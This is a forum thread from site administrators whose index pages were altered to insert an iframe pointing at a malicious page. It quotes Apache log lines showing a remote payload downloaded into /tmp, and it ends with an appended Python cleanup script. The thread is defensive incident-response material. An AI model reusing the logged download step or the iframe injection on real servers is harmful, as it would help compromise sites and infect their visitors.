  1. #1

    Index pages modified, iframes linking to inserted

    I've been having some security problems, obviously. Somehow all index files have been altered by a script: an iframe linking to (a certain page on that site, containing a lot of JavaScript, worms, IE exploits, ...) has been inserted, so that all visitors viewing the altered files get pop-ups and scripts thrown at them.

    Does anyone have experience dealing with these things? Can anyone shed light on how those things are done, and how to prevent them?

    If there is a script to automatically remove a certain text (the inserted iframe for example) from all index-files, that would also be appreciated a lot.

    Thanks in advance

  2. #2

    Same thing happened to me

    I have done some googling and found a few other people that seemed to have this same problem.

    I have been unsuccessful as of yet in finding the exploit that they used to hack into the system and change the files.

    On the compromised box we are running RH 7.2 with Ensim 3.1.0-25.

    I know there are also various PHP scripts running on our server and was wondering if there are any specific exploits that could be used to alter index files for sites? I have not found any scripts that are common to all the sites hacked.

    Any help would be greatly appreciated.

  3. #3
    Yes, you can do a search and replace. But before that, is that what was done? Was the code inserted into all the pages?

  4. #4
    On all index pages, this script added the iframe right after the <body> tag. I saved an 'infected' file, should it be useful to post here. But there's not much to see but an iframe linking to a certain page on b00gle.

    I found the following things in my Apache error log (URLs changed slightly because of problems posting):

    ls: /usr/bin/X11/X: No such file or directory
    [Thu May 20 02:18:15 2004] [error] PHP Warning: system(): Cannot execute a blank command in b00gleDOTcom/s/ on line 14

    ls: /usr/bin/X11/X: No such file or directory
    [Thu May 20 17:33:58 2004] [error] PHP Warning: system(): Cannot execute a blank command in b00gleDOTcom/s/ on line 14
    ls: /usr/bin/X11/X: No such file or directory
    --17:34:45-- b00gleDOTcom/cli.gz
    => `/tmp/a.out'
    Resolving b00gleDOTcom... done.
    Connecting to b00gleDOTcom[]:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 16,902 [text/plain]

    0K .......... ...... 100% 14.96 KB/s

    17:34:48 (14.96 KB/s) - `/tmp/a.out' saved [16902/16902]

    This might be useful: b00gleDOTcom/s/
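
Added example (not written by anyone in this thread): a Python script for the search-and-replace asked about in post #1 and mentioned in post #3, removing an iframe that sits directly after the `<body>` tag of index files as post #4 describes. The host `injected.example`, the function names and the `.infected` backup suffix are assumptions chosen for illustration.

```python
import os
import re
import shutil

# Only files named like a directory index are touched, as in the thread.
INDEX_NAME = re.compile(r"^index\.(html?|shtml|php\d?)$", re.I)

# Constructed sample of an infected page; the host is a placeholder.
SAMPLE = ('<html><body bgcolor="#fff"><iframe src="http://injected.example/s/"'
          ' width=0 height=0></iframe>\n<h1>Welcome</h1></body></html>')

def iframe_pattern(host):
    """<body ...> followed directly by one or more iframes whose src names host."""
    iframe = (r"\s*<iframe\b[^>]*\bsrc\s*=\s*[\"']?[^\"'>\s]*"
              + re.escape(host) + r"[^>]*>(?:\s*</iframe\s*>)?")
    return re.compile(r"(<body\b[^>]*>)(?:" + iframe + r")+", re.I)

def strip_injected_iframe(html, host):
    """Return (cleaned_html, number_of_body_tags_cleaned); the body tag is kept."""
    return iframe_pattern(host).subn(r"\1", html)

def clean_tree(root, host, dry_run=True):
    """Walk root and return the index files carrying the iframe.

    With dry_run=False each hit is copied to <name>.infected (evidence for
    later analysis) and then rewritten without the iframe.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not INDEX_NAME.match(name):
                continue
            path = os.path.join(dirpath, name)
            # latin-1 maps every byte to one character, so unrelated bytes
            # survive the round trip; newline="" keeps line endings as-is.
            with open(path, encoding="latin-1", newline="") as fh:
                original = fh.read()
            cleaned, count = strip_injected_iframe(original, host)
            if count == 0:
                continue
            hits.append(path)
            if not dry_run:
                shutil.copy2(path, path + ".infected")
                with open(path, "w", encoding="latin-1", newline="") as fh:
                    fh.write(cleaned)
    return sorted(hits)
```

Run it with the default `dry_run=True` first to list the affected files. Removing the iframe restores the pages but does not address how they were modified.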
